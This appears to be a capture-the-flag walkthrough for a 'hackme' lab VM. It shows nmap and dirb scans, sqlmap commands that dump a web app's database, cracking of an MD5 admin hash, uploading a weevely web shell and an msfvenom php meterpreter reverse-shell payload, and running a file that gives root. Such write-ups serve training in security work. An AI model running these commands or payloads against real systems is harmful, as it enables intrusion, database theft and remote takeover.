Found the IP of the host using netdiscover and now lets run nmap on it:
Nmap –A –T4 –p- 192.168.1.13 –vv
Port 22 and 80 … lets start dirb to list the directories and see what we can find
Dirb http://192.168.1.13
Clicking the ( Sign up now ) link on the LogIn page directed me to a page to fill in my details and then redirected me again to a Welcome page where I can search for Books
While setting up the account I used burpsuite and captured the information and saved it to a file to run SQLMAP
Sqlmap –r output.txt –dbs –batch
We can see 5 databases , the one we need is the last one with the name ( webapphacking ) so we run:
sqlmap -r sql.txt -D webapphacking –dump-all
Superadmin is sure the one , checked the hash with hash-identifier and its MD5 hash … google it and decode it came with the password : Uncrackable
Login in using superadmin and Uncrackable:
We need to upload a shell code im going to use weevely ( got shell but running the file to become root didn’t work)
Another way is simply create : msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.11 LPORT=4444 -o script.php
Upload it and with meterpreter we set it up
Run exploit and then shell … going straight to /home and then /hackme … only one file to run and it gave us a root
